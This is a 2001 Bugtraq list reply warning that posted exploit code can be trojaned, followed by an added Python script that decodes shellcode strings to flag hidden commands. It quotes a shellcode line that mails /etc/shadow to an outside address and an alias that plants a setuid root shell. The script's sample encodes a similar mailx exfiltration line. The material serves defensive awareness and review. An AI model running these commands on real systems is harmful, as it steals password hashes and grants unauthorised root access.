[18942] in bugtraq


Re: Bind 8 Exploit - Trojan

daemon@ATHENA.MIT.EDU (Jonathan Katz)
Fri Feb 2 02:56:54 2001

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20010201150335.R27696@jonworld.com>
Date:         Thu, 1 Feb 2001 15:03:35 -0500
Reply-To: Jonathan Katz <jon@JONWORLD.COM>
From: Jonathan Katz <jon@JONWORLD.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.31.0102010907000.757-100000@rush>; from
              beldridg@BEST.COM on Thu, Feb 01, 2001 at 09:09:02AM -0800

Yesterday, Matt Lewis wrote:
> How did this get approved, did anyone test it or review it?

and Today, Brett Eldridge pointed out:

> i don't think that the moderator's job is to test all the exploits that
> get mailed to the list.
[...]
> that said, anybody who blindly uses exploit code deserves what they get.
> next time, test the code in a controlled environment.

This is just history repeating itself. Remember that 'sshd exploit
code' someone posted here about 2-3 years back? For some reason you
*had* to run it as root. Buried in its shellcode was a very simple
'mailx JPandKit@hotmail.com < /etc/shadow'. This is just old news and
new kiddies thinking they're being special by playing with old tricks.

If you run code without looking at it or thinking it through, "Boo Hoo!"

Show me something new and exciting.

Security hasn't changed much:
[1] Backdoors/easter-eggs (Sendmail 3.x 'WIZ'->Borland Inprise)
[2] buffer overflows (fingerd->statd->imapd)
[3] race conditions and a lack of randomness (think /tmp, TCP sequencing)
[4] permissions (Remember when SunOS and Solaris installed with a mode 666
    /var/adm/messages? Various distros of Linux did the same 3 years later
    with its syslogs.)
[5] trojans (alias mroe='cp /bin/sh /tmp/sh; chmod 04755 /tmp/sh')

-Jon
--
Jonathan Katz [] jon@jonworld.com [] http://jonworld.com
"Live fast, die young, leave a really messy corpse."
Cell: 317-698-4023 [] Pager: 800-759-8888 1770869 aka 1770869@skytel.com
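
One way to do the "looking at it" step described in the message above before running posted exploit code, as an added example that is not part of the original post: decode the `\xHH` string literals in a C source file and list the printable strings hidden in them. The sample array, the placeholder address and the function names are constructed for illustration.

```python
import re

# Constructed sample: a "shellcode" array as it might appear in a posted
# exploit. The bytes are filler plus two embedded strings, not working code.
SAMPLE_SOURCE = r'''
char shellcode[] =
  "\x90\x90\x90\x90\xeb\x1f\x5e\x89"
  "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
  "\x6d\x61\x69\x6c\x78\x20\x75\x73\x65\x72\x40\x65\x78\x61\x6d\x70"
  "\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x20\x3c\x20\x2f\x65\x74"
  "\x63\x2f\x73\x68\x61\x64\x6f\x77\x00";
'''

LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# \xHH (two digits assumed) or any other character; other escapes such as \n
# are kept as the bare character, which is enough for string triage.
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\?(.)", re.S)
# Strings worth a second look when they turn up inside "shellcode".
SUSPICIOUS = {
    "reads credential file": re.compile(r"/etc/(shadow|passwd)"),
    "sends mail": re.compile(r"\b(mailx?|sendmail)\b"),
    "changes file mode": re.compile(r"\bchmod\b"),
}

def decode_literals(source):
    """Return the bytes of each C string literal, adjacent literals merged."""
    merged = re.sub(r'"\s+"', "", source)  # C joins "a" "b" into "ab"
    return [bytes(int(h, 16) if h else ord(c) & 0xFF
                  for h, c in ESCAPE.findall(lit))
            for lit in LITERAL.findall(merged)]

def embedded_strings(source, min_len=4):
    """Printable ASCII runs found inside the decoded literals."""
    run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii")
            for blob in decode_literals(source) for m in run.finditer(blob)]

def review(source):
    """Map each embedded string to the reasons it deserves a closer look."""
    findings = {}
    for text in embedded_strings(source):
        reasons = [why for why, rx in SUSPICIOUS.items() if rx.search(text)]
        if reasons:
            findings[text] = reasons
    return findings

if __name__ == "__main__":
    for text, reasons in review(SAMPLE_SOURCE).items():
        print(f"{text!r}: {', '.join(reasons)}")
```

A clean result only means no plain-text command was found; encoded or self-modifying payloads still need to be read or run in an isolated test environment.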
